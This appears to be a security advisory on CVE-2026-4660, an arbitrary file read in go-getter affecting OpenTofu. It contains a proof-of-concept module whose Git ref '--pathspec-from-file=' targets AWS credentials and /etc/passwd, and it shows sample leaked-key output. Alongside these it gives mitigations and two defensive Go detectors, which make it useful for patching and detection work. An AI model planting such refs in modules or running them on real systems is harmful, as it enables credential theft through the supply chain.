OpenTofu, Arbitrary File Read via Malicious Git URL, CVE-2026-4660 (High) -DC-Jun2026-485


OpenTofu, an open-source infrastructure-as-code tool, relies on the `go-getter` library to download external dependencies such as providers and modules. The `go-getter` library, maintained by HashiCorp, is vulnerable to CVE-2026-4660, which affects versions up to v1.8.5. This vulnerability allows an attacker to perform arbitrary file reads on the file system during certain Git operations through a maliciously crafted URL.
The vulnerability stems from insufficient input validation in the library’s URL parsing. When processing a maliciously crafted Git URL, `go-getter` can be tricked into passing attacker-controlled arguments to the `git checkout` command. Specifically, an attacker can set the `ref` parameter of a Git URL to `--pathspec-from-file=/path/to/file`. When `go-getter` clones the repository and executes `git checkout` with this argument, Git reads the specified file line by line, treats each line as a pathspec, fails to match any files, and dumps the entire contents of the file in its error output.
This issue affects any tool that uses the vulnerable version of go-getter, including Terraform, Nomad, Packer, and Waypoint. In the context of OpenTofu, an attacker could publish a seemingly legitimate module that contains a nested submodule referencing a malicious repository with the crafted `ref` parameter. When a user runs `tofu init` to download the module, the error output from the failed `git checkout` will contain the contents of the targeted file, potentially exposing sensitive information such as AWS credentials, private keys, or API tokens.
The vulnerability exists in two code paths within go-getter: the `clone()` path, which is taken when the destination directory is absent, and the `update()` path, which is taken when it exists. Both paths call the same vulnerable `checkout()` function. OpenTofu’s module installer always removes the destination directory before invoking go-getter, which triggers the `clone()` path.
The vulnerability is fixed in `go-getter` v1.8.6. OpenTofu has addressed this issue in versions v1.11.10 and v1.12.3 by upgrading to the patched version of the library. The v1.10 series is also impacted, but upgrading the library in that series risks breaking compatibility; users are advised to plan an upgrade to v1.11.10.

DailyCVE Form

Platform: OpenTofu
Version: <1.11.10, >=1.12.0-beta1 <1.12.3
Vulnerability: Arbitrary File Read
Severity: High (CVSS 7.5)
Date: 2026-04-09

Prediction: Patch available (v1.11.10/v1.12.3)

What Undercode Say

The following analytics and commands provide insight into the vulnerability’s behavior and impact.

Vulnerable Code Path Analysis:

go-getter's clone() and update() both call checkout() (simplified sketch, not the library's exact signatures):

// clone() path (triggered when dst is absent)
func (c *GitGetter) clone(dst, ref string) error {
    // ...
    if err := c.checkout(dst, ref); err != nil {
        os.RemoveAll(dst) // deferred removal on error: the partial clone is discarded
        return err
    }
    return nil
}

// update() path (triggered when dst exists)
func (c *GitGetter) update(dst, ref string) error {
    // ...
    if err := c.checkout(dst, ref); err != nil {
        return err // no removal, directory persists
    }
    return nil
}

OpenTofu Module Installer Behavior:

// initwd/module_install.go:251
// OpenTofu always removes destination before calling go-getter
os.RemoveAll(dst)
// This ensures the clone() path is always taken

Vulnerable Git Command Execution:

# The malicious ref makes go-getter run this command
git checkout --pathspec-from-file=/etc/passwd
# Git reads /etc/passwd and outputs its contents as error messages

PoC Repository Structure:

# Attacker's top-level module (tf-aws-vpc)
module "vpc" {
  source = "git::https://github.com/attacker/tf-aws-vpc.git"
}

# Inside the attacker's module, a submodule with a malicious ref
module "internal" {
  source = "git::https://github.com/attacker/tf-internal.git?ref=--pathspec-from-file=/home/runner/.aws/credentials"
}
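A source check in the spirit of the protection advice further down, written for this page and not code from go-getter or OpenTofu: it parses each `git::` module source the way the URL layer would, extracts the `ref` query parameter, and flags a ref that begins with `-` because git would consume it as an option rather than a revision. `OptionLikeRef`, `ScanModuleSources` and the sample HCL are hypothetical; the scan is a regexp pass over `source = "..."` lines rather than a full HCL parse, and scp-style `git@host:repo` sources are skipped because they do not parse as URLs.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// moduleSource matches a `source = "..."` attribute (regexp scan, not a full HCL parse).
var moduleSource = regexp.MustCompile(`source\s*=\s*"([^"]+)"`)

// OptionLikeRef parses a git:: module source and reports whether its ref would be read by
// git as an option (it starts with "-") rather than as a revision. Hypothetical helper
// written for this page, not go-getter's own validation; unparseable sources yield ("", false).
func OptionLikeRef(source string) (ref string, bad bool) {
	if !strings.HasPrefix(source, "git::") {
		return "", false // only forced-git sources carry a ref query parameter
	}
	u, err := url.Parse(strings.TrimPrefix(source, "git::")) // scp-style git@host:repo fails here
	if err != nil {
		return "", false
	}
	ref = u.Query().Get("ref") // keeps everything after the first "=", e.g. "--pathspec-from-file=/x"
	return ref, strings.HasPrefix(ref, "-")
}

// ScanModuleSources returns every module source in an HCL document whose ref looks like an option.
func ScanModuleSources(hcl string) []string {
	var flagged []string
	for _, m := range moduleSource.FindAllStringSubmatch(hcl, -1) {
		if _, bad := OptionLikeRef(m[1]); bad {
			flagged = append(flagged, m[1])
		}
	}
	return flagged
}

// Constructed sample mirroring the nested-module layout described on this page.
const sampleHCL = `module "vpc" {
  source = "git::https://github.com/attacker/tf-aws-vpc.git?ref=v1.4.0"
}
module "internal" {
  source = "git::https://github.com/attacker/tf-internal.git?ref=--pathspec-from-file=/home/runner/.aws/credentials"
}`

func main() { fmt.Println("option-like refs in module sources:", ScanModuleSources(sampleHCL)) }
```

Only the nested `internal` module is reported; the `vpc` module's plain tag and a registry source such as `hashicorp/aws` pass untouched.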

Exploit

An attacker can exploit this vulnerability by publishing a malicious OpenTofu module on a public repository such as GitHub. The module appears legitimate and contains functional code. However, it includes a nested submodule with a `source` URL that specifies a malicious `ref` parameter:

git::https://github.com/attacker/tf-internal.git?ref=--pathspec-from-file=/path/to/target/file

When a victim includes this top-level module in their OpenTofu configuration and runs tofu init, the following occurs:

1. `go-getter` clones the top-level module.
2. It discovers the nested submodule and clones the attacker-controlled repository.
3. It executes `git checkout --pathspec-from-file=/path/to/target/file`.
4. Git reads the target file, fails to match any pathspec, and outputs the file’s contents line by line in the error output.

The `terraform init` or `tofu init` command fails with a module download error, but the error output contains the leaked file contents. For example, an AWS credentials file would be exposed as:

│ Error: Failed to download module
│ │ error: pathspec 'aws_access_key_id = AKIAIOSFODNN7EXAMPLE' did not match any file(s) known to git
│ │ error: pathspec 'aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY' did not match any file(s) known to git

No `tofu apply` is required; the leak occurs during the initialization phase. This makes the vulnerability particularly dangerous in CI/CD pipelines where `tofu init` is run automatically and error logs may be captured and stored.

Protection

To protect against CVE-2026-4660, the following measures are recommended:
1. Upgrade OpenTofu: The primary mitigation is to upgrade to OpenTofu v1.11.10 or v1.12.3, which incorporate the fixed `go-getter` v1.8.6. Users on the v1.10 series should plan an upgrade to v1.11.10.
2. Upgrade go-getter: For projects that directly use go-getter, upgrade to v1.8.6 or later. The `go-getter/v2` branch is unaffected.
3. Review Module Sources: Exercise caution when selecting URLs for downloading modules and providers. Only use trusted sources for OpenTofu dependencies.
4. Monitor Error Logs: Implement monitoring and alerting for unusual error patterns in `tofu init` output, particularly errors containing pathspec failures or file contents.
5. Network Controls: Consider implementing network-level controls to restrict access to Git repositories and other external resources.
6. Dependency Scanning: Use dependency scanning tools to identify vulnerable versions of `go-getter` in your projects.
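An added detector for item 4, not code from OpenTofu or go-getter: it runs over sample `tofu init` output constructed in the shape shown in the Exploit section, flags pathspec errors that look like leaked file lines, and reports key names only so the alert itself does not re-leak the value. `DetectPathspecLeak`, `redact` and `sampleInit` are hypothetical names; the `=`/`:` heuristic and the "more than one pathspec error" rule are assumptions about how a credentials file differs from a normal bad-ref failure.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// pathspecErr captures the quoted value of git's "did not match" error, where each leaked file line ends up.
var pathspecErr = regexp.MustCompile(`error: pathspec '(.*)' did not match any file\(s\) known to git`)

// DetectPathspecLeak scans tofu/terraform init output and returns one redacted entry per
// pathspec error when the run looks like a file leak: a genuinely missing ref produces a
// single error naming that ref, whereas a leaked file produces one error per line, and
// those lines usually carry "=" or ":". Heuristic written for this page, not OpenTofu's.
func DetectPathspecLeak(output string) []string {
	var findings []string
	keyValueSeen := false
	for _, line := range strings.Split(output, "\n") {
		m := pathspecErr.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		keyValueSeen = keyValueSeen || strings.ContainsAny(m[1], "=:")
		findings = append(findings, redact(m[1]))
	}
	if len(findings) < 2 && !keyValueSeen {
		return nil // one plain pathspec error is the normal "bad ref" failure
	}
	return findings
}

// redact keeps only the key name (text before the first "=" or ":") so the alert does not re-leak the value.
func redact(s string) string {
	if i := strings.IndexAny(s, "=:"); i >= 0 {
		return strings.TrimSpace(s[:i]) + "=<redacted>"
	}
	return "<redacted>"
}

// Constructed sample in the shape of the error shown on this page (not captured from a real run).
const sampleInit = `│ Error: Failed to download module
│ │ error: pathspec 'aws_access_key_id = AKIAIOSFODNN7EXAMPLE' did not match any file(s) known to git
│ │ error: pathspec 'aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY' did not match any file(s) known to git`

func main() { fmt.Println("possible file leak in init output:", DetectPathspecLeak(sampleInit)) }
```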

Impact

The impact of CVE-2026-4660 on OpenTofu users is significant:
– Data Exposure: An attacker can read arbitrary files on the system where `tofu init` is executed. This includes sensitive files such as:
  – Cloud provider credentials (AWS, GCP, Azure)
  – Private keys (SSH, TLS)
  – API tokens and secrets
  – Configuration files containing sensitive information
  – Environment variables and deployment configurations
– Supply Chain Attack: The vulnerability can be exploited through a dependency supply chain attack. An attacker can publish a malicious module that appears legitimate, and any user who includes it in their configuration becomes vulnerable.
– CI/CD Pipeline Risk: The vulnerability is particularly dangerous in automated environments such as CI/CD pipelines, where `tofu init` is run automatically and error logs may be stored or displayed. These systems often run with elevated privileges and have access to sensitive data.
– No User Interaction Required: The attack requires no user interaction beyond running `tofu init` on a configuration that includes a malicious module. No `tofu apply` or other action is needed.
– Wide Affected Ecosystem: The vulnerability affects all tools that use the vulnerable version of go-getter, including Terraform, Nomad, Packer, and Waypoint.


Sources:

Reported By: github.com